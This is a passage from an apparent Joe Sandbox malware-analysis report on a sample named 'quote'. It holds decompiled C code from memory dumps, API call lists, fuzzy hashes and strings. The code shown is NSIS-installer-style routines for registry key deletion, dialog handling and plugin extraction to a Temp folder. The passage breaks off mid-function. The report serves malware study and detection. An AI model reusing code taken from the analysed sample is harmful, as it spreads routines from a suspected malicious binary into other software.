                                                                                        • Part of subcall function 6F49122C: lstrcpynW.KERNEL32(00000000,?,6F4912DF,00000019,6F4911BE,-000000A0), ref: 6F49123C
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6F4924A8
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F4924C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: cc4a086d3db8757e9ea2abb46e3f84571211f62464c0af1c8d9ac2d8673f8659
                                                                                      • Instruction ID: 2164f8132629ab90d8152c623132995c9ae9dcbf82b362aa616edad313b57cb8
                                                                                      • Opcode Fuzzy Hash: cc4a086d3db8757e9ea2abb46e3f84571211f62464c0af1c8d9ac2d8673f8659
                                                                                      • Instruction Fuzzy Hash: 4541CF70308705DFEB24EF68C840E667FF9FB9A324B108A1DE455C6E81DB31A645CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 48%
                                                                                      			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                      				void* _v8;
                                                                                      				int _v12;
                                                                                      				short _v536;
                                                                                      				void* _t27;
                                                                                      				signed int _t33;
                                                                                      				intOrPtr* _t35;
                                                                                      				signed int _t45;
                                                                                      				signed int _t46;
                                                                                      				signed int _t47;
                                                                                      
                                                                                      				_t46 = _a12;
                                                                                      				_t47 = _t46 & 0x00000300;
                                                                                      				_t45 = _t46 & 0x00000001;
                                                                                      				_t27 = E0040627E(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                      				if(_t27 == 0) {
                                                                                      					if((_a12 & 0x00000002) == 0) {
                                                                                      						L3:
                                                                                      						_push(0x105);
                                                                                      						_push( &_v536);
                                                                                      						_push(0);
                                                                                      						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                      							__eflags = _t45;
                                                                                      							if(__eflags != 0) {
                                                                                      								L10:
                                                                                      								RegCloseKey(_v8);
                                                                                      								return 0x3eb;
                                                                                      							}
                                                                                      							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
                                                                                      							__eflags = _t33;
                                                                                      							if(_t33 != 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_push(0x105);
                                                                                      							_push( &_v536);
                                                                                      							_push(_t45);
                                                                                      						}
                                                                                      						RegCloseKey(_v8);
                                                                                      						_t35 = E00406806(3);
                                                                                      						if(_t35 != 0) {
                                                                                      							return  *_t35(_a4, _a8, _t47, 0);
                                                                                      						}
                                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                                      					}
                                                                                      					_v12 = 0;
                                                                                      					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}












                                                                                      0x00402e4c
                                                                                      0x00402e55
                                                                                      0x00402e5e
                                                                                      0x00402e6a
                                                                                      0x00402e73
                                                                                      0x00402e7d
                                                                                      0x00402ea2
                                                                                      0x00402ea8
                                                                                      0x00402ead
                                                                                      0x00402eae
                                                                                      0x00402ede
                                                                                      0x00402eb7
                                                                                      0x00402eb9
                                                                                      0x00402f09
                                                                                      0x00402f0c
                                                                                      0x00000000
                                                                                      0x00402f12
                                                                                      0x00402ec8
                                                                                      0x00402ecd
                                                                                      0x00402ecf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402ed7
                                                                                      0x00402edc
                                                                                      0x00402edd
                                                                                      0x00402edd
                                                                                      0x00402eea
                                                                                      0x00402ef2
                                                                                      0x00402ef9
                                                                                      0x00000000
                                                                                      0x00402f22
                                                                                      0x00000000
                                                                                      0x00402f01
                                                                                      0x00402e8d
                                                                                      0x00402ea0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402ea0
                                                                                      0x00402f28

                                                                                      APIs
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 1354259210-0
                                                                                      • Opcode ID: 6b0427dfa76692f151d7caa9231c5c88ba32a8d947b338249052deafdd589e1a
                                                                                      • Instruction ID: 81522b48e592499502658fb4677f1b0f70c545d6b701466da39e5ccb8a756ba0
                                                                                      • Opcode Fuzzy Hash: 6b0427dfa76692f151d7caa9231c5c88ba32a8d947b338249052deafdd589e1a
                                                                                      • Instruction Fuzzy Hash: 0F215A72500109BBEF129F90CE89EEF7A7DEB54344F110076B945B11A0E7B48E54AAA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00401D81(void* __ebx, void* __edx) {
                                                                                      				struct HWND__* _t30;
                                                                                      				WCHAR* _t38;
                                                                                      				void* _t48;
                                                                                      				void* _t53;
                                                                                      				signed int _t55;
                                                                                      				signed int _t60;
                                                                                      				long _t63;
                                                                                      				void* _t65;
                                                                                      
                                                                                      				_t53 = __ebx;
                                                                                      				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                      					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                      				} else {
                                                                                      					E00402D1C(2);
                                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                      				}
                                                                                      				_t55 =  *(_t65 - 0x24);
                                                                                      				 *(_t65 + 8) = _t30;
                                                                                      				_t60 = _t55 & 0x00000004;
                                                                                      				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                      				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                      				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                      				if((_t55 & 0x00010000) == 0) {
                                                                                      					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                      				} else {
                                                                                      					_t38 = E00402D3E(0x11);
                                                                                      				}
                                                                                      				 *(_t65 - 0x44) = _t38;
                                                                                      				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                      				asm("sbb esi, esi");
                                                                                      				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                      				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                      				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                      					DeleteObject(_t48);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                      					_push(_t63);
                                                                                      					E00406358();
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t65 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00401d81
                                                                                      0x00401d85
                                                                                      0x00401d9a
                                                                                      0x00401d87
                                                                                      0x00401d89
                                                                                      0x00401d8f
                                                                                      0x00401d8f
                                                                                      0x00401da0
                                                                                      0x00401da3
                                                                                      0x00401dad
                                                                                      0x00401db0
                                                                                      0x00401db8
                                                                                      0x00401dc9
                                                                                      0x00401dcc
                                                                                      0x00401dd7
                                                                                      0x00401dce
                                                                                      0x00401dd0
                                                                                      0x00401dd0
                                                                                      0x00401ddb
                                                                                      0x00401de5
                                                                                      0x00401e0c
                                                                                      0x00401e1b
                                                                                      0x00401e29
                                                                                      0x00401e31
                                                                                      0x00401e39
                                                                                      0x00401e39
                                                                                      0x00401e42
                                                                                      0x00401e48
                                                                                      0x00402b08
                                                                                      0x00402b08
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                                      • Instruction ID: ee10c8015a3e92cf614b22ba24180aec604fe5fe026a1179c0e7be4a3fdf0cdb
                                                                                      • Opcode Fuzzy Hash: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                                      • Instruction Fuzzy Hash: E621F672900119AFCB05DFA4DE45AEEBBB5EF08314F14003AFA45F62A0C7789D51DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 59%
                                                                                      			E00401C43(intOrPtr __edx) {
                                                                                      				int _t29;
                                                                                      				long _t30;
                                                                                      				signed int _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				long _t36;
                                                                                      				int _t41;
                                                                                      				signed int _t42;
                                                                                      				int _t46;
                                                                                      				int _t56;
                                                                                      				intOrPtr _t57;
                                                                                      				struct HWND__* _t63;
                                                                                      				void* _t64;
                                                                                      
                                                                                      				_t57 = __edx;
                                                                                      				_t29 = E00402D1C(3);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 - 0x18) = _t29;
                                                                                      				_t30 = E00402D1C(4);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 + 8) = _t30;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                      					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
                                                                                      				}
                                                                                      				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                      					 *(_t64 + 8) = E00402D3E(0x44);
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                      				_push(1);
                                                                                      				if(__eflags != 0) {
                                                                                      					_t61 = E00402D3E();
                                                                                      					_t32 = E00402D3E();
                                                                                      					asm("sbb ecx, ecx");
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t35 =  ~( *_t31) & _t61;
                                                                                      					__eflags = _t35;
                                                                                      					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					_t63 = E00402D1C();
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t41 = E00402D1C(2);
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                      					if(__eflags == 0) {
                                                                                      						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                      						L10:
                                                                                      						 *(_t64 - 0x38) = _t36;
                                                                                      					} else {
                                                                                      						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                      						asm("sbb eax, eax");
                                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                      				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                      					_push( *(_t64 - 0x38));
                                                                                      					E00406358();
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t64 - 4));
                                                                                      				return 0;
                                                                                      			}















                                                                                      0x00401c43
                                                                                      0x00401c45
                                                                                      0x00401c4c
                                                                                      0x00401c4f
                                                                                      0x00401c52
                                                                                      0x00401c5c
                                                                                      0x00401c60
                                                                                      0x00401c63
                                                                                      0x00401c6c
                                                                                      0x00401c6c
                                                                                      0x00401c6f
                                                                                      0x00401c73
                                                                                      0x00401c7c
                                                                                      0x00401c7c
                                                                                      0x00401c7f
                                                                                      0x00401c83
                                                                                      0x00401c85
                                                                                      0x00401cda
                                                                                      0x00401cdc
                                                                                      0x00401ce7
                                                                                      0x00401cf1
                                                                                      0x00401cf4
                                                                                      0x00401cf4
                                                                                      0x00401cfd
                                                                                      0x00000000
                                                                                      0x00401c87
                                                                                      0x00401c8e
                                                                                      0x00401c90
                                                                                      0x00401c93
                                                                                      0x00401c99
                                                                                      0x00401ca0
                                                                                      0x00401ca3
                                                                                      0x00401ccb
                                                                                      0x00401d03
                                                                                      0x00401d03
                                                                                      0x00401ca5
                                                                                      0x00401cb3
                                                                                      0x00401cbb
                                                                                      0x00401cbe
                                                                                      0x00401cbe
                                                                                      0x00401ca3
                                                                                      0x00401d06
                                                                                      0x00401d09
                                                                                      0x00401d0f
                                                                                      0x00402b08
                                                                                      0x00402b08
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                                      • Instruction ID: 0f37489a7ff55aa34ce709233052591c61f0789b3923deb1f93634f017c8c928
                                                                                      • Opcode Fuzzy Hash: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                                      • Instruction Fuzzy Hash: E821AD7195420AAEEF05AFB4D94AAEE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00404C14(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                      				char _v68;
                                                                                      				char _v132;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				void* _t31;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t44;
                                                                                      				signed int _t46;
                                                                                      				signed int _t50;
                                                                                      				signed int _t52;
                                                                                      				signed int _t53;
                                                                                      				signed int _t55;
                                                                                      
                                                                                      				_t23 = _a16;
                                                                                      				_t53 = _a12;
                                                                                      				_t44 = 0xffffffdc;
                                                                                      				if(_t23 == 0) {
                                                                                      					_push(0x14);
                                                                                      					_pop(0);
                                                                                      					_t24 = _t53;
                                                                                      					if(_t53 < 0x100000) {
                                                                                      						_push(0xa);
                                                                                      						_pop(0);
                                                                                      						_t44 = 0xffffffdd;
                                                                                      					}
                                                                                      					if(_t53 < 0x400) {
                                                                                      						_t44 = 0xffffffde;
                                                                                      					}
                                                                                      					if(_t53 < 0xffff3333) {
                                                                                      						_t52 = 0x14;
                                                                                      						asm("cdq");
                                                                                      						_t24 = 1 / _t52 + _t53;
                                                                                      					}
                                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                                      					_t55 = _t24 >> 0;
                                                                                      					_t46 = 0xa;
                                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                      				} else {
                                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                      					_t50 = 0;
                                                                                      				}
                                                                                      				_t31 = E0040644E(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                      				_t33 = E0040644E(_t44, _t50, _t55,  &_v132, _t44);
                                                                                      				_t34 = E0040644E(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                                      				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                      				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                                      			}



















                                                                                      0x00404c1d
                                                                                      0x00404c22
                                                                                      0x00404c2a
                                                                                      0x00404c2b
                                                                                      0x00404c38
                                                                                      0x00404c40
                                                                                      0x00404c41
                                                                                      0x00404c43
                                                                                      0x00404c45
                                                                                      0x00404c47
                                                                                      0x00404c4a
                                                                                      0x00404c4a
                                                                                      0x00404c51
                                                                                      0x00404c57
                                                                                      0x00404c57
                                                                                      0x00404c5e
                                                                                      0x00404c65
                                                                                      0x00404c68
                                                                                      0x00404c6b
                                                                                      0x00404c6b
                                                                                      0x00404c6f
                                                                                      0x00404c7f
                                                                                      0x00404c81
                                                                                      0x00404c84
                                                                                      0x00404c2d
                                                                                      0x00404c2d
                                                                                      0x00404c34
                                                                                      0x00404c34
                                                                                      0x00404c8c
                                                                                      0x00404c97
                                                                                      0x00404cad
                                                                                      0x00404cbe
                                                                                      0x00404cda

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404CB5
                                                                                      • wsprintfW.USER32 ref: 00404CBE
                                                                                      • SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: b76ac1a0420e4e0b333c5bf6ce8dc1ffaa1bbe794a9e104b7afa440aa402e0f9
                                                                                      • Instruction ID: 33068f1a2098bbc59acf923d0b26dc9f7285eb9428391dcb76f0b5068863668e
                                                                                      • Opcode Fuzzy Hash: b76ac1a0420e4e0b333c5bf6ce8dc1ffaa1bbe794a9e104b7afa440aa402e0f9
                                                                                      • Instruction Fuzzy Hash: 6A11EB73A041283BEB00656D9D46E9E329C9B85334F264237FA25F31D1E978C82182EC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E00405CE6(WCHAR* _a4) {
                                                                                      				WCHAR* _t9;
                                                                                      
                                                                                      				_t9 = _a4;
                                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                                      				_push(_t9);
                                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                                      					lstrcatW(_t9, 0x40a014);
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}




                                                                                      0x00405ce7
                                                                                      0x00405cf4
                                                                                      0x00405cf5
                                                                                      0x00405d00
                                                                                      0x00405d08
                                                                                      0x00405d08
                                                                                      0x00405d10

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CEC
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CF6
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405D08
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                      • Instruction ID: e2e9208f063340fd7176cb3713d1db1a131c248cac7d4947b15e4777b480a213
                                                                                      • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                      • Instruction Fuzzy Hash: 4FD0A771101A306AC1117B84AC05DDF669CAE85300381403BF201B30A4C77C1D5187FD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E00402636(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                      				signed int _t14;
                                                                                      				int _t17;
                                                                                      				void* _t24;
                                                                                      				intOrPtr* _t29;
                                                                                      				void* _t31;
                                                                                      				signed int _t32;
                                                                                      				void* _t35;
                                                                                      				void* _t40;
                                                                                      				signed int _t42;
                                                                                      
                                                                                      				_t29 = __edi;
                                                                                      				_t24 = __ebx;
                                                                                      				_t14 =  *(_t35 - 0x28);
                                                                                      				_t40 = __edx - 0x38;
                                                                                      				 *(_t35 - 0x10) = _t14;
                                                                                      				_t27 = 0 | _t40 == 0x00000000;
                                                                                      				_t32 = _t40 == 0;
                                                                                      				if(_t14 == __ebx) {
                                                                                      					if(__edx != 0x38) {
                                                                                      						_t17 = lstrlenW(E00402D3E(0x11)) + _t16;
                                                                                      					} else {
                                                                                      						E00402D3E(0x21);
                                                                                      						E00406433("C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp\System.dll", 0x400);
                                                                                      						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp\System.dll");
                                                                                      					}
                                                                                      				} else {
                                                                                      					E00402D1C(1);
                                                                                      					 *0x40adf0 = __ax;
                                                                                      					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                      				}
                                                                                      				 *(_t35 + 8) = _t17;
                                                                                      				if( *_t29 == _t24) {
                                                                                      					L13:
                                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                      				} else {
                                                                                      					_t31 = E00406371(_t27, _t29);
